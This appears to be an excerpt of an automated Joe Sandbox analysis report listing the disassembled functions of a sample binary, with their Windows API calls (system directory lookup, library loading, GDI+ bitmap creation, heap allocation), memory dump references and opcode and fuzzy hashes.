                                    • Instruction ID: a79c46090341e4c7904058e366c3f986c6c9695774999a290101df730dd5f6f4
                                    • Opcode Fuzzy Hash: 76d80bc3ef95e6a5150fc6290e3bfd634e62476f514f801d9846723961b4ef31
                                    • Instruction Fuzzy Hash: 5EE09B7550011857CB22AB64DC05FD5B79CAB083E1F0141A1FD49D71A0D770AD849AE0
                                    Function 00350085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003500A0
                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0034EB86,Crypt32.dll,00000000,0034EC0A,?,?,0034EBEC,?,?,?), ref: 003500C2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: DirectoryLibraryLoadSystem
                                    • String ID:
                                    • API String ID: 1175261203-0
                                    • Opcode ID: 264dbd9c4cb1034be15c0344ae4025b626b58f660c580ac637d7c7b27d1473ec
                                    • Instruction ID: 4c408bcc8b5d4947f41fccfc1205ef3223dee8c44a2ef937f2e3fcd2311180d6
                                    • Opcode Fuzzy Hash: 264dbd9c4cb1034be15c0344ae4025b626b58f660c580ac637d7c7b27d1473ec
                                    • Instruction Fuzzy Hash: 86E0127690112C6ADB629AA49C45FD6B7ACFF09382F0400A5B949D7154DA74DA888BE0
                                    Function 00359B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00359B30
                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00359B37
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: BitmapCreateFromGdipStream
                                    • String ID:
                                    • API String ID: 1918208029-0
                                    • Opcode ID: 570a8c66a06228a018350b451671a6d1ebb6bf0d84e1dd51f1a706182d828b35
                                    • Instruction ID: 0a7c2ba1b05fc840363dd97098ac1e487421f7ab18f406b56ad3e0d844b733f5
                                    • Opcode Fuzzy Hash: 570a8c66a06228a018350b451671a6d1ebb6bf0d84e1dd51f1a706182d828b35
                                    • Instruction Fuzzy Hash: 2FE0ED71901218EBDB25EF98D901B99B7ECEB08322F20845FEC9997614D7B16E089B91
                                    Function 0036215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0036329A: try_get_function.LIBVCRUNTIME ref: 003632AF
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0036217A
                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00362185
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                    • String ID:
                                    • API String ID: 806969131-0
                                    • Opcode ID: 0f15225520856cba2ee644bc4bc90cb0a97560fa36e8116c95813240d4fe98cd
                                    • Instruction ID: f1b25d9599228f0716768e98b53d454beb9f2b46d0451e62bd70fc7521fa4fa6
                                    • Opcode Fuzzy Hash: 0f15225520856cba2ee644bc4bc90cb0a97560fa36e8116c95813240d4fe98cd
                                    • Instruction Fuzzy Hash: C3D0222864CF02242D1B37B02C660EB23889853BB47F3CB86FB30CE0DEEE1880447021
                                    Function 0035DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • DloadLock.DELAYIMP ref: 0035DC73
                                    • DloadProtectSection.DELAYIMP ref: 0035DC8F
                                      • Part of subcall function 0035DE67: DloadObtainSection.DELAYIMP ref: 0035DE77
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Dload$Section$LockObtainProtect
                                    • String ID:
                                    • API String ID: 731663317-0
                                    • Opcode ID: 45ac898fd98975b0100a0e5a4ad4fe5c860c4e98491c40572da70a3d526579ac
                                    • Instruction ID: 72d4e90d0adf32b22016df3976c4e35c9bff823e4a7f417e5654975f90360372
                                    • Opcode Fuzzy Hash: 45ac898fd98975b0100a0e5a4ad4fe5c860c4e98491c40572da70a3d526579ac
                                    • Instruction Fuzzy Hash: BFD0C970100240AAC23BAB54A946F5C22B8F7067A6F640651E9078E4B0DBE45488C645
                                    Function 003412E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ItemShowWindow
                                    • String ID:
                                    • API String ID: 3351165006-0
                                    • Opcode ID: afb41e322d670946d2e1f93946dde22876760cfb6e243549a7158c309d9a58b7
                                    • Instruction ID: 01b0185a2bbcbca5d0d1953045249370ed6d79a2227f0a4302fda2660b03f0a5
                                    • Opcode Fuzzy Hash: afb41e322d670946d2e1f93946dde22876760cfb6e243549a7158c309d9a58b7
                                    • Instruction Fuzzy Hash: 50C01232058200BECB020BB4DC09D2FBBACEBA6312F05C908B2A5C0060C23CC010DB11
                                    Function 003419A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: c2a490d9b07ec57dfd25a22c941f470eeda6dae951fa4561ddbc0530737f9180
                                    • Instruction ID: 90d7d93df8d6742d45d55e5abf909ba6cbf1272942d0e17277ec5b392dcb406d
                                    • Opcode Fuzzy Hash: c2a490d9b07ec57dfd25a22c941f470eeda6dae951fa4561ddbc0530737f9180
                                    • Instruction Fuzzy Hash: ABC18070A04A449FEF26DF68C884BA97BE5EF06300F0944B9DC45DF286CB31AD84CB61
                                    Function 00343B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: 81f9526d17e6fb8b09cfd207642bb88c1a3c84337dee6060398fb4f88d039980
                                    • Instruction ID: c48f6ae5a7f7852788ce3479a2a036dfc1ec39cb17f81c281db9295249f65a67
                                    • Opcode Fuzzy Hash: 81f9526d17e6fb8b09cfd207642bb88c1a3c84337dee6060398fb4f88d039980
                                    • Instruction Fuzzy Hash: 0671AB71504F44AEDB26DB70CC81AEBB7E8AF15301F44496EE5AB4F242DA327A48DF11
                                    Function 0034837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00348384
                                      • Part of subcall function 00341380: __EH_prolog.LIBCMT ref: 00341385
                                      • Part of subcall function 00341380: new.LIBCMT ref: 003413FE
                                      • Part of subcall function 003419A6: __EH_prolog.LIBCMT ref: 003419AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: 170a114fa64381b9a4b10df7b6df018ffc9fcf9e01d89ff3d88b277dc684292a
                                    • Instruction ID: b6d202ee76409611f1776df2e44ce780b1398c0be2bc7e5d1a8a5eddfbaf0273
                                    • Opcode Fuzzy Hash: 170a114fa64381b9a4b10df7b6df018ffc9fcf9e01d89ff3d88b277dc684292a
                                    • Instruction Fuzzy Hash: C841B2318406549ADB26EB61C855BFEB3E8AF50300F0540EAE58A9F192DF747BC8DB50
                                    Function 00341E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00341E05
                                      • Part of subcall function 00343B3D: __EH_prolog.LIBCMT ref: 00343B42
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: a71038cd2a32606ebcaa45aaabbcaddc5851c9cf6eafe5cbe8657fc409b3f063
                                    • Instruction ID: 1a6d04e76634fea80b5635fb8f86495ca65d7f6e93485e8fdb2d47dc135f509c
                                    • Opcode Fuzzy Hash: a71038cd2a32606ebcaa45aaabbcaddc5851c9cf6eafe5cbe8657fc409b3f063
                                    • Instruction Fuzzy Hash: 30214B769045089FCB16EF99D951AEEFBF5FF58300B10006DE845AB261CB326E94CB60
                                    Function 0035A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0035A7C8
                                      • Part of subcall function 00341380: __EH_prolog.LIBCMT ref: 00341385
                                      • Part of subcall function 00341380: new.LIBCMT ref: 003413FE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: 93d297a4c7b1201438b45226156e3853bd8ba297e7ca3cee7c230263d1f690e9
                                    • Instruction ID: f7286a4c5c0963ba8c5cbb41ee4260ae51d750d1414d3582105209c1b6fda284
                                    • Opcode Fuzzy Hash: 93d297a4c7b1201438b45226156e3853bd8ba297e7ca3cee7c230263d1f690e9
                                    • Instruction Fuzzy Hash: 59217F75C046499ECF16DF54C9419EEBBF4EF19300F0005EEE809AB212D7356E4ADBA1
                                    Function 003492E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: f6e9c8d85682740a04875d3fc8bd403709225caa47cc33ea5d2a8f6335d92840
                                    • Instruction ID: 8f62df4d53ee3374cab238a3dbad2564cfd8f2c28a676c22f81ba074171cb0ca
                                    • Opcode Fuzzy Hash: f6e9c8d85682740a04875d3fc8bd403709225caa47cc33ea5d2a8f6335d92840
                                    • Instruction Fuzzy Hash: 36118E77E115289BCB23AFA8CC41ADEB7B6EF49750F054116F804AF261CA34AD1086A0
                                    Function 0034AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                    • Instruction ID: 116cc2ffdd90f0763ec7425c307681818620437157e847fd0974edf9b8956a9f
                                    • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                    • Instruction Fuzzy Hash: 19F08C31990B059FDB32DA68C941616B7E8EB15320F20891AE496CF690E770F880C742
                                    Function 00345BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00345BDC
                                      • Part of subcall function 0034B07D: __EH_prolog.LIBCMT ref: 0034B082
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: dfb2c23e8564f8f8bfd0de8a3d5012de63004f9daa49a434478e3fc919d6e261
                                    • Instruction ID: 74c223c8d6b6270f5b597025ecdaa05c60f3c18eea1b0447f2a7ada6a46cbc2d
                                    • Opcode Fuzzy Hash: dfb2c23e8564f8f8bfd0de8a3d5012de63004f9daa49a434478e3fc919d6e261
                                    • Instruction Fuzzy Hash: 5F01AD30A04684DEC726F7A8C0053EDF7E49F19301F44809EA85A1B283CBB42B08C6A2
                                    Function 00368518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0036C13D,00000000,?,003667E2,?,00000008,?,003689AD,?,?,?), ref: 0036854A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 75fb704346b704f468f3416c766a53f1dbbec5a3f7daaf5f27b4c3c3fa8232ec
                                    • Instruction ID: ffa5960490cc44ff383a8a7bff1b59315e179e53272a005da6908615259ae33a
                                    • Opcode Fuzzy Hash: 75fb704346b704f468f3416c766a53f1dbbec5a3f7daaf5f27b4c3c3fa8232ec
                                    • Instruction Fuzzy Hash: 64E0E5215412215AEB332B699C00B9A378C9F4B3F0F16C310EF1AA609DCF20CC0145E6
                                    Function 0034A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0034A4F5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CloseFind
                                    • String ID:
                                    • API String ID: 1863332320-0
                                    • Opcode ID: 10a60d998a446426604eed270c7bb187be4b7ce29b50eeec9d844c2abc9fdac6
                                    • Instruction ID: 32b370d915267ca7969288f583ae2759e57a7d3e4b2cd5f4e1e7040b68dc7f9f
                                    • Opcode Fuzzy Hash: 10a60d998a446426604eed270c7bb187be4b7ce29b50eeec9d844c2abc9fdac6
                                    • Instruction Fuzzy Hash: 27F0E931048B80AACA335B7848047CBBBD56F06331F04CA49F1FD0E292C27474C59723
                                    Function 0035067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 003506B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ExecutionStateThread
                                    • String ID:
                                    • API String ID: 2211380416-0
                                    • Opcode ID: a5ea55477b9933395d9a3b3a1bf9e5b207c000d03779b46ca96a498bbb883de7
                                    • Instruction ID: c9d849ff2f6ebbbf18234990183f6eeadc38a611d3c6a7be2dad628883c498c4
                                    • Opcode Fuzzy Hash: a5ea55477b9933395d9a3b3a1bf9e5b207c000d03779b46ca96a498bbb883de7
                                    • Instruction Fuzzy Hash: C3D02B3830011065C62B3765A80BFFE1A8A4FC3712F0A00A1BD0D1F1A78B4708CE53E3
                                    Function 00359D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GdipAlloc.GDIPLUS(00000010), ref: 00359D81
                                      • Part of subcall function 00359B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00359B30
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                    • String ID:
                                    • API String ID: 1915507550-0
                                    • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                    • Instruction ID: 48950dd3c6dbf229c94823ffffe00604f5f3642276ef96539519c7bb0d742161
                                    • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
